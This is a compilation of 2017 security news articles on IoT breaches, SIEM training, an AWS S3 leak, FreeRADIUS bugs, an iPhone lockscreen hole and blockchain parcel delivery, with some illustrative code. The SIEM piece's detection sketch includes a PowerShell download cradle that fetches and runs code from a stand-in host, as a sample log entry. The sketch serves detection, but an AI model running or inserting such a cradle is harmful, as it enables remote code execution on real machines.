
IoT Security Incidents Rampant and Costly

New research offers details about the hidden – and not so hidden – costs of defending the Internet of Things.


Internet of Things breaches and security incidents have hit nearly half of the companies that use such devices, and the cost to deal with these attacks is usually more than traditional breaches, according to recent survey results.

Two separate studies each found that 46% of respondents suffered a security breach or incident as a result of an attack on IoT devices.

One survey, released this month by IDC, queried approximately 100 IT security, IT operations, and other C-suite executives, while another, released in June by consulting firm Altman Vilandrie Co., gathered data from approximately 400 IT executives in 19 countries.

Not only are the costs associated with securing IoT devices expected to rise in the coming years but they are also expected to account for as much as a third of the IT spending budget, according to Altman Vilandrie. The vast majority of IDC survey respondents say the cost to address IoT security incidents and breaches tends to run more than the cost of fixing traditional breaches and incidents.

Here is a breakdown of the combined results. 

 

Dawn Kawamoto is an Associate Editor for Dark Reading, where she covers cybersecurity news and trends. She is an award-winning journalist who has written and edited technology, management, leadership, career, finance, and innovation stories for such publications as CNET’s … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/iot-security-incidents-rampant-and-costly/d/d-id/1329367?_mc=RSS_DR_EDT

SIEM Training Needs a Better Focus on the Human Factor

The problem with security information and event management systems isn’t the solutions themselves but the training that people receive.

Logging solutions — or, more specifically, security information and event management (SIEM) solutions — have a bad reputation. Many implementations involve large sums of money and the promise to catch unauthorized and malicious activity. Fast forward a year or two into the deployment and often you will find upset senior management, exhausted security teams, and few detection capabilities. It isn’t unheard of for organizations to swap SIEM systems every couple of years, similar to how organizations treat antivirus software.

The problem isn’t with any specific SIEM solution. Instead, it’s a lack of focus on people and processes. Well-trained staff can implement a strong detection platform regardless of SIEM product. This doesn’t mean that all SIEM solutions are equal but, rather, that there is too much focus on products and not enough on people. Training from SIEM vendors is based on how to use their products. This is and should be required to properly use any solution, but it isn’t enough. SIEM is a tool, and the focus must also be on the individual(s) wielding the tool.

By changing the focus to individuals, the core problem can start to be addressed. For example, assume you or another staff member attended training on how to catch the bad guys using a SIEM system. The focus, rather than being on maintaining/using a SIEM product, is on things such as which data sources are important, why they’re important, and how to enrich those data sources so they make more sense, add context, and are more useful. The training may also include various methods to intentionally set up events to automatically send alerts on unauthorized activity. Would this individual not be better equipped to use any SIEM platform? I would argue that people who know why to use a SIEM system and what to use it for will have a much easier time figuring out how to get a SIEM platform to do what they need it to do.

The PowerShell Problem
Consider an example to illustrate this problem: PowerShell. PowerShell is a thing of beauty, allowing users to automate tasks and do things they otherwise couldn’t. However, it’s an attacker favorite to use against us. Many modern attacks use PowerShell to evade antivirus systems, whitelisting products, and other security technologies. Yet with a tactical SIEM architecture and proper logging, catching unauthorized PowerShell use can be simple. A properly trained individual can quickly use a SIEM platform to identify things such as:

  • PowerShell being invoked from a command line with a long length
  • PowerShell using base64 encoding
  • PowerShell making calls to external systems
  • A system performing large amounts of PowerShell calls
  • A system invoking PowerShell outside powershell.exe by using Sysmon DLL monitoring in conjunction with the specific PowerShell DLLs
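The first few of those detections boil down to simple string heuristics over command-line logs. A rough sketch of the idea in Python – the field names, thresholds, and patterns here are invented for illustration, not taken from any SIEM product:

```python
import base64
import re

# Toy heuristics mirroring the detections above; thresholds are illustrative.
LONG_CMDLINE = 400                              # unusually long command line
B64_BLOB = re.compile(r"[A-Za-z0-9+/=]{40,}")   # long base64-looking run

def suspicious_powershell(cmdline: str) -> list:
    """Return the reasons a PowerShell command line looks suspicious."""
    reasons = []
    lowered = cmdline.lower()
    if "powershell" not in lowered:
        return reasons
    if len(cmdline) > LONG_CMDLINE:
        reasons.append("long command line")
    if "-encodedcommand" in lowered or "-enc " in lowered or B64_BLOB.search(cmdline):
        reasons.append("base64 encoding")
    if "http://" in lowered or "https://" in lowered:
        reasons.append("call to external system")
    return reasons

# Example log entry: a download cradle hidden behind an encoded command.
payload = b"IEX (New-Object Net.WebClient).DownloadString('https://evil.example/p')"
entry = "powershell.exe -enc " + base64.b64encode(payload).decode()
print(suspicious_powershell(entry))
```

In a real deployment these checks would run as SIEM correlation rules over process-creation or PowerShell operational logs rather than as standalone code, but the logic is the same.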

Taking this further, a trained individual may try exporting all unique PowerShell cmdlets found within SIEM logs and using the result as a detection-based whitelist, a technique that is applicable across multiple data sources. They may also use the whitelist to filter out all logs unless they use an unknown cmdlet, thus severely decreasing the number of logs being collected. This simple process can detect 99.99% or possibly even 100% of PowerShell-based malware, and yet SIEM training doesn’t cover this concept.
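A minimal sketch of that whitelist idea, assuming command lines have already been exported from PowerShell logs (the regex is a crude Verb-Noun approximation of a cmdlet, not a complete grammar):

```python
import re

# Crude Verb-Noun cmdlet pattern, e.g. Get-Process, Invoke-Mimikatz.
CMDLET = re.compile(r"\b[A-Za-z]+-[A-Za-z]+\b")

def build_whitelist(historical_logs):
    """Collect every unique cmdlet seen in historical PowerShell logs."""
    seen = set()
    for line in historical_logs:
        seen.update(m.lower() for m in CMDLET.findall(line))
    return seen

def unknown_cmdlets(log_line, whitelist):
    """Return cmdlets in a new log line that were never seen before."""
    return sorted({m.lower() for m in CMDLET.findall(log_line)} - whitelist)

history = [
    "Get-ChildItem -Path C:\\Users",
    "Set-Location C:\\; Get-Process",
]
wl = build_whitelist(history)
# Invoke-Mimikatz was never seen before, so only it survives the filter.
print(unknown_cmdlets("Get-Process; Invoke-Mimikatz -DumpCreds", wl))
```

Events containing only whitelisted cmdlets can then be dropped or down-prioritised, which is where the large reduction in collected logs comes from.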

This is not a failure on the part of the SIEM vendors. Their training is on how to use their product, which is necessary. The problem is that SIEM-neutral training geared toward individuals didn’t exist until recently.

Remember that SIEM is a tool. Your mileage will vary dramatically, based on the individuals using the tool. If you want a successful detection platform, make sure your team is trained on the following:

  • Key data sources, including what they are, why they’re important, and how to use and collect them
  • How to enrich logs and why you need to do so
  • Intentional detection techniques such as implementing virtual tripwires
  • The difference between a bad alert (high false positives) and a good alert (low or zero false positives)
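As a toy illustration of the “virtual tripwire” idea: seed the environment with decoy accounts that nobody legitimate would ever use, then alert on any event that names one. Because no real workflow touches the decoys, such an alert has effectively zero false positives. The account names and event format below are invented:

```python
# Decoy accounts that exist only as bait; any reference to them is an alert.
DECOY_ACCOUNTS = {"svc-backup-old", "admin-test"}

def tripwire_alerts(auth_events):
    """Return the events that reference a decoy account."""
    return [e for e in auth_events if e.get("account", "").lower() in DECOY_ACCOUNTS]

events = [
    {"account": "jsmith", "action": "logon", "host": "ws01"},
    {"account": "svc-backup-old", "action": "logon", "host": "ws07"},
]
print(tripwire_alerts(events))  # only the decoy-account event
```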

If you wish to learn more, please check out the SANS course SEC555: SIEM with Tactical Analytics or research these concepts online. The more the security community gives back, the better we’ll all do.


Justin Henderson is a SANS Instructor and course author of SEC555: SIEM with Tactical Analytics, and CEO of H A Security Solutions. He is a passionate security architect and researcher with over a decade of experience working in the healthcare industry. He has also had … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/siem-training-needs-a-better-focus-on-the-human-factor/a/d-id/1329348?_mc=RSS_DR_EDT

Dow Jones index – of customers, not prices – leaks from AWS repo

Dow Jones has emulated Verizon by saving various internal databases (including Wall Street Journal subscribers) in the cloud without properly securing them.

The breach was turned up by UpGuard’s Chris Vickery and is detailed in this post.

It’s an all-too-familiar, straightforward breach: someone left a cloud repository configured to offer “semi-public access”, meaning “the sensitive personal and financial details of millions of the company’s customers” was exposed.

“While Dow Jones has confirmed that at least 2.2 million customers were affected, UpGuard calculations put the number closer to 4 million accounts,” the post adds.

The repo was an AWS S3 bucket with the wrong privacy settings: by configuring it to allow access to authenticated users, whoever set it up didn’t seem to realise they were offering access to any authenticated AWS user – not just those with Dow Jones-associated accounts.
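That misconfiguration corresponds to an ACL grant for S3’s predefined “AuthenticatedUsers” group, which means any AWS account holder anywhere, not just your own users. A sketch of checking for it, using the Grants structure returned by S3’s GetBucketAcl API (the example ACL document is invented):

```python
# Predefined S3 group URIs that expose a bucket beyond your own account.
RISKY_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",  # any AWS user
    "http://acs.amazonaws.com/groups/global/AllUsers",            # anyone at all
}

def risky_grants(acl):
    """Return (group URI, permission) pairs that expose the bucket."""
    return [
        (g["Grantee"]["URI"], g["Permission"])
        for g in acl.get("Grants", [])
        if g.get("Grantee", {}).get("Type") == "Group"
        and g["Grantee"].get("URI") in RISKY_GROUPS
    ]

acl = {  # shape of a GetBucketAcl response for a bucket like dj-skynet
    "Grants": [
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "READ"},
    ]
}
print(risky_grants(acl))
```

In practice you would fetch the ACL with an S3 client and run a check like this across every bucket in the account.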

UpGuard says Chris Vickery discovered the breach at the end of May (in other words, he was working on the breach before UpGuard announced he’d joined them).

He analysed the repo – called “dj-skynet”, because even sysadmins for the quants have a sense of humour – and discovered a rich trove.

There’s a customer file – the one UpGuard reckons has upwards of 4 million records – that includes “customer names, internal Dow Jones customer IDs, home and business addresses, and account details, such as the promotional offer under which a customer signed up for a subscription”.

There’s a risk and compliance database filled with dossiers on individuals, ranging from “a great many financial industry personnel located around the world” to less salubrious characters. UpGuard’s post includes an extract of what the database holds about the late Libyan leader Muammar Gaddafi.

Dow Jones has confirmed the breach but has told outfits like The Hill it wasn’t serious enough to warrant a customer announcement, since passwords and credit card numbers weren’t leaked (only enough data to mount a phishing campaign, or help identity theft). Regarding the “risk and compliance” dossiers, it says the database included only public information.

News Corporation, Dow Jones’ parent company, has another cloudy cock-up to defend today: Australian pay TV operation Foxtel’s streaming video service crashed when a wave of Game of Thrones fiends came in search of new episodes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/18/dow_jones_index_of_customers_not_prices_leaks_from_aws_repo/

Dev to Reg: Making web pages pretty is harder than building crypto

+Comment An Australian computer scientist working in Thailand has offered his contribution to Australia’s cryptography debate by creating a public-key crypto demonstrator in less than a day, using public APIs and JavaScript.

Brandis.io is not a useful encryption implementation (the site itself says as much), but it is a useful public education exercise.

By using the WebCryptoAPI, author Dr Peter Kelly has implemented end-to-end crypto in just 445 lines of JavaScript code.

As Kelly writes at GitHub, “Brandis does not implement encryption itself; instead, it relies on the Web Cryptography API provided by your browser, and simply exposes a user interface to this API that enables its use by non-programmers.”

Hence its smallness: the cryptography is already out there, in the form of straightforward calls to public APIs – there’s more JavaScript devoted to screen furniture than to generating public and private keys, or encrypting/decrypting the messages.

Dr Kelly’s Brandis.io crypto demonstrator

As Kelly told Vulture South: “I spent way more time on [the presentation] than I did on the crypto-using code. Picking a colour scheme took longer than writing the code for generating a public/private key pair.”

Kelly warns visitors to the site not to treat this as a messaging platform: “Brandis is primarily intended as a demonstration; it was put together in less than a day. For real-world usage, we recommend more established software such as GnuPG.”

By the way, if you decide to try Brandis.io, note that its current message size limit is 95 characters. Kelly’s investigating why that’s so. ®

+Comment: Vulture South notes that Kelly’s effort only addresses one part of the debate the Australian government ignited when its Attorney-General George Brandis fired the latest shot in what’s being colloquially called “CryptoWars 2”. The other half is device security.

A common critique levelled at those who resist the idea of governments undermining encryption (the so-called “war on mathematics”, highlighted when Prime Minister Malcolm Turnbull unhelpfully quipped that Australia’s laws will prevail over the laws of mathematics) is that they’ve got the wrong end of the stick: messages could be recovered by means that don’t attack encrypted messages in transit, but rather while they’re at rest – for example, by recovering messages as stored on devices like iPhones or Androids.

First, it’s worth keeping in mind that the government itself drew attention towards strong encryption, with its complaint that singled out specific end-to-end encrypted applications, and its promise to get platform-makers to co-operate (as well as device vendors).

More importantly, however, the argument that an endpoint compromise is okay ignores history. Whether it’s the sloppy IoT security that let the Mirai botnet hose big servers, the leaked NSA tools that let loose ransomware rampages, or the DNS Changer malware attack that began in 2006, there’s ample evidence of the danger posed by insecure endpoints.

“You can’t have security if you have insecure endpoints” was first expressed to this writer in the 1990s, and it’s still true. We can’t deflect concerns about weak cryptography by saying “you can still have strong crypto, if vendors will make weak devices”.

Even the NSA couldn’t keep device exploits secret, after all. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/17/encryption_with_apis_and_445_lines_of_js/

FreeRADIUS fragged by fuzzer – by invitation – and fifteen fails found

The folks over at FreeRADIUS took a look at Guido Vranken’s work with OpenSSL, liked what they saw, asked him to fuzz the famous login/security server … and then didn’t like what they saw.

Pretty much anybody who’s logged into an ISP account has touched FreeRADIUS, since it’s the most popular implementation of the venerable authentication system.

As this post explains, after Vranken disclosed bugs in OpenSSL, he tipped off the FreeRADIUS maintainers about a similar (now fixed) bug in their project.

They followed up by asking him to conduct a joint project, and that turned up a haul of 15 issues, four of which could be exploitable, and one of which is a remote code execution bug (RCE).

The RCE, CVE-2017-10984, is a write overflow in the data2vp_wimax() function. In the version 3 series of FreeRADIUS (not version 2), anyone who can send packets accepted by the server could trigger the overflow.

The post explains that the exploit vector is via WiMAX attributes “which have the ‘continuation’ flag set, but for which there is no subsequent data”.

Absent RCE, the post notes that the bug also offers a denial-of-service vector.

The post also highlights that the fuzzing project turned up six issues in DHCP that are fixed in FreeRADIUS, mostly related to memory handling errors that offered denial-of-service vectors.

Proper deployments should be at least moderately protected if they follow best practice, since the server should not be directly exposed to the Internet. That means attack vectors should only exist for insiders or members of roaming consortia.

Kaspersky’s Threatpost quotes FreeRADIUS founder Alan DeKok as explaining the limited exploitability of the bugs: “To be clear: these issues aren’t exploitable by end users in any way. Even the roaming groups typically use IPSec or TLS to transport RADIUS traffic, which means they’re largely not vulnerable, either”.

Regardless, FreeRADIUS’s disappointment is palpable in the post: “There are about as many issues disclosed in this page as in the previous ten years combined”, it states (italics preserved from original post).

A long program of static tests – the post name-checks Coverity, Clang analyser, cppcheck, and PVS-Studio – clearly hasn’t been enough to turn up all the bugs, which arise because “C is a terrible language for security”.
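Static analysers check code without running it; a fuzzer instead hammers the running parser with mutated inputs and records which ones crash it. A minimal random-mutation harness can be sketched in a few lines – the parser and its planted length-check bug below are our toy example, not FreeRADIUS code:

```python
import random

def parse_packet(data: bytes):
    """Toy parser with a planted bug: a length byte that runs past the buffer."""
    if len(data) < 2:
        raise ValueError("too short")                    # handled input error
    length = data[1]
    if 2 + length > len(data):
        raise IndexError("read past end of buffer")      # the planted bug
    return data[2:2 + length]

def fuzz(seed_input: bytes, iterations: int = 500, rng=None):
    """Mutate one random byte per iteration; collect inputs that crash."""
    rng = rng or random.Random(0)                        # seeded: reproducible runs
    crashers = []
    for _ in range(iterations):
        data = bytearray(seed_input)
        data[rng.randrange(len(data))] = rng.randrange(256)
        try:
            parse_packet(bytes(data))
        except ValueError:
            pass                                         # expected, handled error
        except IndexError:
            crashers.append(bytes(data))                 # bug triggered
    return crashers

# Seed packet: type byte, length=3, payload "abc" -- valid until mutated.
crashes = fuzz(b"\x01\x03abc")
```

Real fuzzers such as the one used against FreeRADIUS add coverage feedback and smarter mutation strategies, but the crash-collection loop is the same shape.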

“We will therefore be integrating the fuzzer into all future releases of the server. We will be updating our automated build system to run with memory sanitizers enabled. We strongly recommend that other software projects follow the same practices.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/07/18/freeradius_bugs/

FBI Issues Warning on IoT Toy Security

IoT toys are more than fun and games: they can potentially violate children’s privacy and safety, the Federal Bureau of Investigation warned Monday.

Internet-connected toys carry the potential of violating children’s privacy and safety, given the amount of information the toys can collect and store, the Federal Bureau of Investigation warned on Monday.

The sensors, microphones, data storage capabilities, cameras, and other multi-media features of IoT toys could potentially gather information on a child regarding their name, school, activity plans and physical location.

And if those toys are hacked, the information and data collected could potentially be used by attackers to do a child harm, the FBI warned. The FBI advisory offered advice on selecting an IoT toy, such as connecting it only to a secure and trusted WiFi network, researching the toy to ensure it can receive firmware and software updates, and investigating where the information entered into the toy is stored.

Read more about the FBI advisory here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/fbi-issues-warning-on-iot-toy-security/d/d-id/1329373?_mc=RSS_DR_EDT

New IBM Mainframe Encrypts All the Things

Next-generation Z series features the elusive goal of full data encryption – from an application, cloud service, or database in transit or at rest.

In the first major mainframe announcement by IBM in a decade, the company today unveiled its next-generation Z series that supports full-blown encryption for data via applications, cloud, and databases rather than today’s more common practice of pockets of crypto.

Encryption remains a high bar for many organizations to deploy en masse; it’s more often deployed at specific layers or portions of the data flow. And yes, mainframes are still a thing: The majority of credit card transactions run on IBM mainframes today, and other financial, insurance, and travel transactions still rely on the big ol’ iron. IBM enlisted experts and customers from 150 different companies in building the architecture of the new Z system, including ADP and Highmark Healthcare.

“The challenge everyone has is it was too expensive to encrypt all of this … not really [expensive] in money, but I mean in processing time,” says Caleb Barlow, vice president of threat intelligence at IBM Security. Transaction-based systems can’t afford degradation of performance or user experience, he says. “When you’re moving money or visiting an ecommerce website … the encryption and decryption” steps can slow the process, he says.

So in most cases, encryption happens between the Web browser and the application server, or in a storage array. After each step of the data flow, the data is decrypted, so it doesn’t remain locked down.

The Z system keeps data encrypted across the board, from the network to the storage array, in what IBM calls “pervasive” encryption, explains Barlow.

IBM engineered encryption into the Z’s postage-stamp-sized silicon processor: 6 billion transistors there are dedicated to encryption processing, he says. “The machine doesn’t slow down when it’s asked to encrypt and decrypt” data, he says. The only time data is decrypted is when an organization needs to work with it.

The IBM Z, which sells for around $500,000 and ships this quarter, can run more than 12 billion encrypted transactions per day, and includes what IBM calls “tamper-responding” encryption keys, which are killed at any sign of an attack so they can’t be stolen, then restored when the coast is clear.

Mainframes, while less prevalent these days, are still juicy targets for attackers. Researchers at Trend Micro recently discovered IBM Z Series mainframes (aka OS/390 machines) and IBM iSeries (aka AS/400 mainframes) left exposed on the public Internet, half of which were in the US. Exposed File Transfer Protocol (FTP) ports were the culprit in many of the cases.

Trend Micro’s researchers say mainframes are at risk of what they call “business process compromise” attacks, where attackers infiltrate an organization and modify its mainframe transaction processes in order to siphon money surreptitiously.

John Clay, director of global threat intelligence communications at Trend Micro, says many exposed systems discovered via Shodan scans are misconfigured in some way. “The nice thing in what we hope to see with the IBM [Z] announcement is that an organization using the Z can implement encryption of the data at rest or in transit so that with any type of compromise” the data can’t be stolen because it’s encrypted, Clay says.

But don’t expect an all-encrypted data world anytime soon. “It’s going to take a while to get these systems in place,” Trend’s Clay notes. But it could bring about a “sea change” in the encryption space, he says.

The Ponemon Institute’s recent Global Encryption Trends Study found that in the past 11 years, the proportion of organizations with enterprise-wide encryption strategies has doubled, from less than 20% to over 40%. Most still employ an ad-hoc encryption strategy to date: 61% of organizations encrypt employee and HR data; 56%, payment data; 49%, financial records; and 40%, customer data, according to the report.


Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/new-ibm-mainframe-encrypts-all-the-things/d/d-id/1329372?_mc=RSS_DR_EDT

Siri implicated in yet another iPhone lockscreen hole

Last week, Computerworld reported a security hole in the iPhone lockscreen.

The hole wasn’t catastrophic, but when you consider that “locked” is supposed to mean locked, you shouldn’t be able to change any configuration settings on someone else’s phone without unlocking it first.

The Computerworld “hack” involves popping up Siri at the lockscreen by holding down the Home button for a second or so, and then saying the words, “Cellular data”. (In the UK, at least, you can also say “Mobile data”.)

Siri then asks if you’d like to turn data off, thus effectively cutting the phone off from the network.

This doesn’t sound like the end of the world from a security point of view, and perhaps it isn’t, but you can see how the feature could be abused.

By siriptiously (sorry, surreptitiously) turning off someone’s phone connection while they’re not looking, but leaving their phone apparently untouched, you could help an accomplice who is about to try some sort of social engineering attack against the victim that would otherwise attract their attention with an unwanted verification call or a warning SMS.

Sure, you could steal or hide their phone, or even just turn off the ringer, with a similar result, but a missing phone might be noticed, so to speak, and even silenced phones usually vibrate when they want attention.

According to Computerworld, the bug exists even on the latest iOS 10.3.2 release – that’s what we’re running, so we put it to the test.

Does it work?

The good news is that we couldn’t replicate Computerworld’s hack.

We were able to activate Siri, to issue the peremptory words, “Mobile data”, and to get directly at a screen offering to turn it off.

But when we told Siri to turn it off, he immediately said (our Siri is a bloke, don’t know why), “You’ll need to unlock your iPhone first,” and popped up the passcode screen to unlock the phone, as you would expect.

What to do?

The bad news is that you can never be quite sure which voice commands will, and which won’t, work when your device is locked – unless you can figure out and try all of them.

So, whether this is a bug or not, we strongly recommend that you turn Siri off at the lockscreen – after all, it’s not called the lock screen for nothing.

To stop Siri listening in at the lockscreen, go to Settings | Siri and turn off Access When Locked.

Better yet, unless you really don’t like touching your phone, consider turning Siri off altogether, which has the handy side-effect of telling Apple to discard all the pattern-matching voice data it’s collected from you so far.

While you’re about it, review the other iOS features you’ve enabled on the lockscreen, in case you’re allowing more access than you thought.

It’s bad enough that Apple no longer allows you to block access to the camera app when your phone is locked; we recommend that you add as few additional lockscreen options as you can.

Go to Settings | Touch ID & Passcode and look at the Allow access when locked section.

(We’ve got Siri turned off altogether; if he/she is enabled, you’ll see him/her in this list, too.)

Remember, when it comes to your lockscreen, less is more.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/tjz4TqHneYk/

Wait, you didn’t want to clean the toilets? Should have read the terms!

Roll up your sleeves and grab the brushes: you’re now on bathroom duty at the next county festival. Yes, you voluntarily agreed to 1,000 hours of community service when you clicked your approval of WiFi provider Purple’s terms of service (TOS).

What? You failed to read the fine print? You just scrolled to the end and clicked OK? You aren’t alone. Purple has a cadre of 22,000 who willingly agreed to perform community service in return for their access to Purple’s free WiFi.

Purple added a “Community Service Clause” to their terms of service. The clause gave Purple discretion to assign community duty to the user, which included:

  • Cleansing local parks of animal waste
  • Providing hugs to stray cats and dogs
  • Manually relieving sewer blockages
  • Cleaning portable lavatories at local festivals and events
  • Painting snail shells to brighten up their existence
  • Scraping chewing gum off the streets

Purple’s intent was to highlight the need for all of us to read the TOS. Purple’s CEO commented:

WiFi users need to read terms when they sign up to access a network. What are they agreeing to, how much data are they sharing, and what license are they giving to providers? Our experiment shows it’s all too easy to tick a box and consent to something unfair.

So how many individuals noticed the “Community Service Clause” in Purple’s TOS?

One user – yes, just one of the 22,000+ who signed up during the two-week period of the test – spotted the clause and disagreed with the TOS.

Those with longer memories may remember GameStation’s 2010 April Fool’s Day adjustment to their TOS and order form. Users could opt out (and receive a £5 voucher) or click through and agree to sell their immortal soul. It turned out that 88% of users were willing to give up their immortal souls.

A 2016 paper by Jonathan Obar and Anne Oeldorf-Hirsch, “The biggest lie on the internet: Ignoring the Privacy Policies and Terms of Service Policies of Social Networking Services”, showed exactly what Purple’s two-week test showed: the vast majority of individuals – 98% – miss the “gotcha clauses”.

That’s because users fail to read the TOS page.  The researchers used a TOS of more than 4,300 words, which would take about 15 minutes to read properly. The median read time for the 543 university students? A blazing speed read of 51 seconds.
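The back-of-the-envelope arithmetic makes the gap stark. The word count and times come from the study; the implied reading speeds are our own calculation:

```python
# Figures from the Obar/Oeldorf-Hirsch study.
words = 4300
proper_read_minutes = 15
median_read_seconds = 51

# Implied reading speeds in words per minute.
implied_wpm_proper = words / proper_read_minutes           # a careful read
implied_wpm_median = words / (median_read_seconds / 60)    # the median student
print(round(implied_wpm_proper), round(implied_wpm_median))  # 287 5059
```

A median “reading” speed of roughly 5,000 words per minute is not reading at all; it’s scrolling to the consent button.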

And yes, the content contained several items which the average user would balk at allowing. These included:

  • Provide your first-born child as payment
  • Your social network content will be shared with your employer
  • Your social network content will be shared with the NSA

Purple’s fun and the researchers’ findings both serve to drive home an important point.

Read what you sign!

Yes, you really do need to mine those TOS or privacy policies for those hidden gems of “consent” buried within mind-numbing text if you don’t want to end up selling your soul.


 

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/IlNfVOeDCLs/

What does Imogen Heap have in common with mail? The blockchain

One of Bitcoin’s attractions was always anonymity, but if you used it to buy something, your parcel was always trackable. Now, some researchers have used the blockchain concept underpinning it to make deliveries anonymous, too.

Bitcoin may have made money anonymous, but the problem is that privacy collapses as soon as you touch conventional centralized institutions, like the postal service or branded delivery companies. If you don’t want someone to know what you ordered, you take a risk sending it via the mail – although with drugs so easily concealable, many in Canada have willingly taken that chance for years.

Now, academics have taken the onion routing concept popularized by Tor and married it with the blockchain to produce an anonymous parcel delivery system that is difficult, if not impossible, to track.

As described in this academic paper, the Lelantos delivery system uses Ethereum, one of the most promising new blockchains. While Bitcoin stores records of financial transactions in the blockchain, Ethereum runs entire programs in it. They’re called smart contracts, and are written in a language called Solidity. The contracts are distributed across different nodes in the blockchain and therefore not controlled by any one party. They use rules and events to trigger messages and send Ethereum’s own currency, called Ether.

How Lelantos works

Bob has ordered something privately from Alice on the dark web, and doesn’t want anyone to know that he’s the recipient. Especially Eve, who has an unhealthy interest in his affairs. He could have Alice send it to a PO box, but then the mail carrier might open his parcel and tell Eve.

Instead, Bob chooses several delivery companies that support Lelantos. He uses the Ethereum smart contract to organize them in a chain, with each relaying the package to another.

Along with his order to Alice, he sends an encrypted message with a tracking number and the address of the first delivery company in his chain. He also sends encrypted messages to a selection of chosen delivery companies. Each contains the encrypted addresses of the other delivery companies.

Alice takes his Ether, and sends the incriminating item to the first company. Bob’s smart contract, which is keeping track of all this, then gives it instructions to create a label using the address of the next company in the chain. Each time the parcel arrives at a new delivery company, the smart contract (which no one can link to Bob) instructs that company to send it on using the encrypted address they were given.

He can do this as many times as he likes, getting delivery companies to play pass the parcel until he feels confident to collect the parcel. He then sends a message to stop relaying the parcel and wait for him to come and pick up the item. So at no point will any party know the source and destination of the package, meaning that if they opened it, they wouldn’t be able to compromise Bob.
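In spirit, each delivery company holds a key that reveals only its own next-hop instruction, so no single courier ever sees the whole route. A toy sketch of that idea – the XOR “cipher” here is deliberately simplistic, for illustration only, and emphatically not the cryptography the Lelantos paper specifies:

```python
import hashlib

def keystream(key: bytes, n: int) -> bytes:
    """Toy counter-mode keystream from SHA-256 -- NOT real cryptography."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:n]

def xor(data: bytes, key: bytes) -> bytes:
    """XOR with the keystream; applying it twice recovers the plaintext."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# Bob's chain: each (key, next-hop) pair belongs to one delivery company.
chain = [(b"key-A", b"CourierB, 12 Relay St"),
         (b"key-B", b"CourierC, 99 Hop Ave"),
         (b"key-C", b"PICKUP: wait for Bob")]

def wrap(chain):
    """Encrypt each next-hop so only the holder of that key can read it."""
    return {key: xor(next_hop, key) for key, next_hop in chain}

instructions = wrap(chain)
# Courier A decrypts its own instruction and learns only the next hop:
print(xor(instructions[b"key-A"], b"key-A"))  # b'CourierB, 12 Relay St'
```

In Lelantos the smart contract, not Bob, hands each company its encrypted instruction at the right moment, which is what keeps the chain unlinkable to him.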

Even the most nefarious villains sometimes slip up. Ross Ulbricht, the mastermind behind the Silk Road dark web site, was finally collared after ordering fake identity documents from Canada delivered to his address on 15th Street in San Francisco. The police intercepted the package and paid him a visit, as they outline in this document, which is a fascinating account of OPSEC gone wrong.

If anyone ever deploys Lelantos, we’ve no doubt that people will use it to deliver goods and materials that are against the law, like Ulbricht. That’s predictable, but assuming that Bob wasn’t the illegal type, why might he want to use an anonymous delivery service as a legitimate user?

The paper raises the spectre of Eve profiling him based on his reading habits, or targeting him for burglary after seeing that he had expensive items delivered. He might buy certain legal medicines by mail, or an HIV test kit, and Eve might work for his life insurance company.

The Lelantos paper also cites another use case: simple communication. Former president Jimmy Carter apparently prefers the postal service as a means of communicating with world leaders, because he doesn’t trust the intelligence agencies not to read his emails. For true privacy, perhaps he should consider a service like Bob’s?

From anonymous parcels to fair music

This is an ingenious use of the blockchain, and follows a trend in the use of the technology which tends to cut out the middle person. As with its original application in Bitcoin, the idea with many newer implementations is to remove a single player – a bank, a large “sharing economy” broker, an auction-style e-commerce marketplace – and connect people directly to each other, giving them a way to transact while ensuring that no one can tamper with the system.

Why wouldn’t you want a central hub to control everything? It could snoop on your data, rig markets, or just decide that it doesn’t like you and freeze your accounts. This is why the blockchain carries such promise.

While Lelantos decentralizes the parcel delivery process, another application decentralizes the music business. Some music distribution sites want to reward lots of people, specifically everyone involved in producing a song or album.

Music is an industry that the blockchain could disrupt, but there’s a right and a wrong way to do it. We’ve seen artists such as RAC go it alone to distribute entire albums directly on the Ethereum blockchain in a bid to cut out the middle man. That creates a complex and confusing process for the listener, as even he admits in this Motherboard interview.

Buying Ethereum is still something of a bottleneck, but you’re going to have to buy ether. I’d recommend going to Coinbase or something like that to buy some. The album will be on a website and will work with a lot of built-in Ethereum wallets, like MetaMask or Parity. All you need to have is the chrome browser with the ether account already attached to it.

You can almost hear thousands of fans blinking slowly and backing away as they read that.

That’s the problem with blockchain-based tech. It is inherently complex – people I know still ask “is Bitcoin money? I don’t get it. Wasn’t there that exchange that got hacked?”

The blockchain might still be unfathomable for the average music fan, but it’s a great way to ensure that everyone working on a piece of creative content gets paid when someone streams or buys it online.

Musician Imogen Heap is building one called Mycelia after experimenting with blockchain-based music distribution using Ethereum. The idea is to create a fair, sustainable music system that pays everyone involved.

If smart contracts can hold details about which delivery company to send a parcel to next and how much money to send them, then they can also hold details about who wrote the song for a particular track or did the sampling. They could also pay contributors their cut automatically when someone uses Ether to buy the song – and that might cut down on exploitative recording contracts.
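The payout rule itself is just a pro-rata split of the purchase price. A sketch in plain Python – the contributors and shares are invented, and in a real deployment this logic would live in the smart contract itself:

```python
def split_payment(amount_wei: int, shares: dict) -> dict:
    """Split a payment by percentage shares; integer-division dust to first listed."""
    total = sum(shares.values())
    payouts = {who: amount_wei * pct // total for who, pct in shares.items()}
    remainder = amount_wei - sum(payouts.values())
    first = next(iter(shares))
    payouts[first] += remainder        # don't lose the rounding remainder
    return payouts

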